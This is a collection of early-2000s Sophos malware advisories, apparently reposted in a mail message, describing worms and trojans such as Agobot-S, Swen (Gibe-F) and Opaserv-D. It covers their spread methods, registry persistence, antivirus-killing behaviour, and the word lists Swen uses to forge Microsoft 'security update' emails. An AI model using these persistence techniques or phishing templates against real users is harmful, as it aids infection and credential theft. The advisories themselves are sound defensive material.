[cut-n-paste from sophos.com]

W32/Agobot-S

Aliases
Backdoor.Agobot.3.f, W32/Gaobot.worm.ab, W32.HLLW.Gaobot.AE, WORM_AGOBOT.AB

Type
Win32 worm

Detection
At the time of writing Sophos has received just one report of this worm from
the wild.

Description
W32/Agobot-S is a IRC backdoor Trojan and network worm.

W32/Agobot-S copies itself to network shares with weak passwords and attempts
to spread to computers using the DCOM RPC and the RPC locator vulnerabilities.

Microsoft has issued patches for the vulnerabilities exploited by this worm.
These patches are available from

http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

and

http://www.microsoft.com/technet/security/bulletin/MS03-001.asp

When first run, W32/Agobot-S copies itself to the Windows System folder as
scvhost.exe and creates the following registry entries so that scvhost.exe is
run automatically each time Windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\
Run\Config Loader = scvhost.exe

and

HKLM\Software\Microsoft\Windows\CurrentVersion\
RunServices\Config Loader = scvhost.exe

On Windows NT, 2000 and XP W32/Agobot-S may run itself as a new service called
Cfgldr.

Each time W32/Agobot-S is run it attempts to connect to a remote IRC server
and join a specific channel. W32/Agobot-S then runs continuously in the
background, allowing a remote intruder to access and control the computer via
IRC.





Troj/JSurf-A

Aliases
VBS/JunkSurf-A

Type
Trojan

Detection
Sophos has received several reports of this Trojan from the wild.

Description
Troj/JSurf-A arrives via an HTML email exploiting a vulnerability reportedly
fixed in the Cumulative Patch of Internet Explorer (MS03-032).

The email contains a Object Data tag that runs a VBS script on a remote site.
The script drops an EXE in the C:\ drive as DRG.EXE. This component of
Troj/JSurf-A connects to a remote website, downloads a DLL to C:\Program
Files\win32.dll and then runs regsvr32.exe to register it on the system.

The Trojan relies upon a vulnerability in Microsoft's software. Microsoft
issued a patch which reportedly fixes the problem in August 2003. The patch can
be found at www.microsoft.com/technet/security/bulletin/MS03-032.asp.





WM97/Oragon-A

Aliases
W97M.Ping.A, W97M_ORAGON.A

Type
Word 97 macro virus

Detection
At the time of writing Sophos has received just one report of this virus from
the wild.

Description
WM97/Oragon-A removes the Macro option from the Word Tools drop-down menu.

On the first day of the month WM97/Oragon-A sets the caption of the active
document so that it displays the username of the current user and attempts to
bring up an animation of the Office Assistant application.





W32/Gibe-F

Aliases
W32/Swen.A{at}mm, I-Worm.Swen, Worm.Automat.AHB

Type
Win32 worm

Detection
Sophos has received many reports of this worm from the wild.

Description
W32/Gibe-F is a worm which spreads by emailing itself via its own SMTP engine
to addresses extracted from various sources on the victim's drives (e.g. MBX
and DBX files). The worm also spreads using the KaZaA peer-to-peer shared
folders, via IRC channels and will copy itself to the Startup folder of mapped
network drives. W32/Gibe-F may also attempt to spread via usenet newsgroups
(NNTP).

W32/Gibe-F will attempt to get a user to enter email account details by
displaying a fake error dialog box with fields for entering user name,
password, email address and server names.

If the worm is run with a filename which starts with a P,Q,U or I (regardless
of the case) the W32/Gibe-F displays the message

"Microsoft Internet Update Pack
This update does not need to be installed on this system" or

"This will install Microsoft Security Update. Do you wish to continue?"

and may also pretend to be an installation package by displaying an
installation window with the following messages in the title bar:

"Searching for installed components ..."
"Extracting files ..."
"Copying files ..."
"Updating registry ..."

If W32/Gibe-F detects the installation of a debugger active in memory it
displays the message "Try to pull my legs?".

The worm copies itself to the Windows folder as a randomly-named lowercase
executable (e.g. jlfsm.exe) and adds an entry to the registry at

HKLM\Software\Microsoft\Windows\CurrentVersion\Run to run itself on system
restart.

The worm also changes the entries in the registry at:

HKCR\exefile\shell\open\command
HKCR\regfile\shell\open\command
HKCR\comfile\shell\open\command
HKCR\batfile\shell\open\command
HKCR\piffile\shell\open\command
HKCR\scrfile\shell\open\command
HKCR\scrfile\shell\config\command

so that it is run before EXE, COM, PIF, BAT, SCR files and to display a false
error message (e.g. "Error occurred Memory access violation in module kernel32
at :") when REG files are opened.

The worm sets several entries in the registry to signify installation, confirm
KaZaA infection and to prevent REGEDIT.EXE from running.

W32/Gibe-F may also create a file called SWEN1.DAT in the Windows folder
containing a list of several IP addresses and domain names which may be NNTP
servers.

W32/Gibe-F may attempt to exploit a vulnerability in Microsoft's software which
allows automatic execution of attachments while viewing an email message.
Microsoft issued a patch which reportedly fixes this vulnerability in 2001. The
patch is available from
www.microsoft.com/technet/security/bulletin/MS01-027.asp. (This patch fixes a
number of vulnerabilities in Microsoft's software, including the one exploited
by this worm.)

Emails constructed by the worm have the following characteristics:

From: may be the bona fide victim's name or may be randomly constructed from
the following

unknown
Microsoft
Support
Assistance
Services
Bulletin
Customer
Public
Technical
Center
Department
Section
Division
Security
Network
Internet
Program
Corporation
Microsoft
MS
Domain
Server
Receiver
Recipient
Client
Receiver
Recipient
Puremail
America
Netmail
Freemail
Bigfoot
Rocketmail
Routine
Program
Daemon
Automat
Engine
Service
Mailer
master
System
Service
Delivery
Storage
Message
Email
Postmaster
Administrator

and

bulletin
confidence
advisor
updates
technet
support,
newsletters
ms
msn
microsoft
msdn
.com
.net

(e.g. MS Support Department {at}support.microsoft.com)

To: randomly constructed from the following

User
Client
Consumer
Partner
Customer
Commercial
Corporation
Microsoft
MS

Subject line: randomly constructed from the following

Corp.
Corporation
comes
which
Internet Explorer
Windows
update
package
correction
corrective
security
critical
internet
important
these
Install
Apply
Watch
Take a look at
Look at
Try on
Taste
Prove
Check out
Check
Upgrade
Update
Critical
Latest
Newest
Current
M$
MS
from
comes
came
which
this
that
these
the
See
Watch
Use
Apply

Message text: randomly constructed from the following

MS
Microsoft
Customer,
this is the latest version of security update, the
, Cumulative Patch update which
This update includes the functionality
of all previously released patches.
computer
system
on your
executable
to run
malicious user
attacker
the most serious of which could
allow an
from these vulnerabilities
maintain the security of your computer
protect your computer
continue keeping your computer secure
Install now to
vulnerabilities
newly discovered
as well as three
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
eliminates
resolves

the attached file (EXE, COM, PIF, BAT, SCR or ZIP) may have a randomly
generated name or may be randomly chosen from the following

PATCH
UPDATE
UPGRADE
INSTALL

W32/Gibe-F copies itself to the KaZaA shared folder and to the Windows folder
with various EXE or ZIP filenames randomly contructed from the following(e.g
"WINZIP UPLOAD.EXE"):

Virus Generator
Magic Mushrooms Growing
Cooking with Cannabis
Hallucinogenic Screensaver
My naked sister
XXX Pictures
Sick Joke",
XXX Video
XP update
Emulator PS2
XboX Emulator
HardPorn
Jenna Jameson
Hotmail hacker
Yahoo hacker
AOL hacker
fixtool
cleaner
removal tool
remover
Sircam
Bugbear
installer
upload
hacked
key generator
Windows Media Player
GetRight FTP
Download Accelerator
Winamp
WinZip
WinRar
KaZaA media desktop
Kazaa Lite

W32/Gibe-F attempts to terminate various processes related to anti-virus or
security software (e.g. sweep95, zonealarm and blackice).





W32/Opaserv-D

Aliases
Worm.Win32.Opasoft.d, BackDoor-ALB trojan

Type
Win32 worm

Detection
At the time of writing Sophos has received just one report of this worm from
the wild.

Description
W32/Opaserv-D is a variant of W32/Opaserv-A and is a worm that spreads via
network shares.

When executed the worm will create a file called scrsvr.exe in the Windows
folder on the current drive. W32/Opaserv-D then adds the following registry
entry to run itself when the system starts:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScrSvr =
C:\WINDOWS\ScrSvr.exe

The worm attempts to copy itself to the Windows folder on networked computers
with open shared drives. It then modifies the win.ini file on the remote
machine to ensure the copied file will be run on system start. The worm also
searches local IP addresses for open C: shares and attempts to copy itself to
the Windows folder of the share. Once the local area network has been scanned
the worm will start performing the same search on the internet starting at a
randomly generated IP address. As a result anyone connected to the internet who
has file sharing enabled and who enables NETBIOS over TCP/IP is potentially
vulnerable to this worm.

W32/Opaserv-D also attempts to connect to a website that is currently
unavailable. This attempted connection is most likely intended as a means of
updating the worm executable.

The following three non-viral files may be found in the root folder of infected
systems:

tmp.ini
scrsin.dat
scrsout.dat





W32/Sluter-B

Aliases
W32.Randex.F

Type
Win32 worm

Detection
Sophos has received several reports of this worm from the wild.

Description
W32/Sluter-B is a worm that propagates over network shares with weak passwords.

The worm copies itself to the Windows system folder as netd32.exe and sets the
following registry entries so as to run on system startup:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Microsoft Network Daemon for Win32 = netd32.exe

and

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
Microsoft Network Daemon for Win32 = netd32.exe

Additionally W32/Sluter-B acts as an IRC based backdoor Trojan, allowing a
remote intruder unlimited access to the affected computer.





WM97/Simuleek-C

Aliases
Macro.Word97.Omni, W97M.Radnet, W97M_BUHAY, W97M/Simuleek

Type
Word 97 macro virus

Detection
At the time of writing Sophos has received just one report of this virus from
the wild.

Description
WM97/Simuleek-C is a macro virus that drops a VBS script detected by Sophos
Anti-Virus as VBS/Simuleek-C.

VBS/Simuleek-C is added to the WIN.INI so that the script runs on startup. The
virus has the ability to re-infect the Word environment.

WM97/Simuleek-C may attempt to replace occurrences of the word
"Ranuya" with
the word "John".





W32/Slanper-A

Aliases
W32/Slanper.worm, Win32/HLLW.Rejase.A

Type
Win32 worm

Detection
Sophos has received several reports of this worm from the wild.

Description
W32/Slanper-A is an internet worm that targets SMB/Windows shares using port
445. All Windows shares are SMB but SMB shares may also be hosted on Unix and
other operating systems. The worm may arrive with the filename msmsgri3.exe.

Upon execution the worm installs itself as a background process with the same
name and sets the registry entry

HKLM/Software/Microsoft/Windows/CurrentVersion/Run/mssyslanhelper

to contain the path to itself.

W32/Slanper-A then generates a random list of IP numbers and attempts to
connect to them using port 445 in attempt to copy itself to available shares.
W32/Slanper-A also has some backdoor functionality.

The worm also extracts a secondary component to the same folder with the
filename payload.dat. If payload.dat is executed it sets the registry entry

HKLM/Software/Microsoft/Windows/CurrentVersion/Run/System Initialization

to contain the path to itself, initiates TCP port connection and runs in the
background listening on open ports.





Troj/JSurf-B

Type
Trojan

Detection
At the time of writing Sophos has received just one report of this Trojan from
the wild.

Description
Troj/JSurf-B arrives via an HTML email exploiting a vulnerability reportedly
fixed in the Cumulative Patch of Internet Explorer (MS03-032).

The email contains an Object Data tag that runs a VBS script on a remote site.
The script drops an EXE in the C:\ drive as SFBAR.EXE. This component of
Troj/JSurf-B connects to a remote website, downloads a DLL to C:\Program
Files\win32.dll and then runs regsvr32.exe to register it on the system.

The Trojan relies upon a vulnerability in Microsoft's software. Microsoft
issued a patch which reportedly fixes the problem in August 2003. The patch can
be found at www.microsoft.com/technet/security/bulletin/MS03-032.asp.






 
--- MultiMail/Win32 v0.43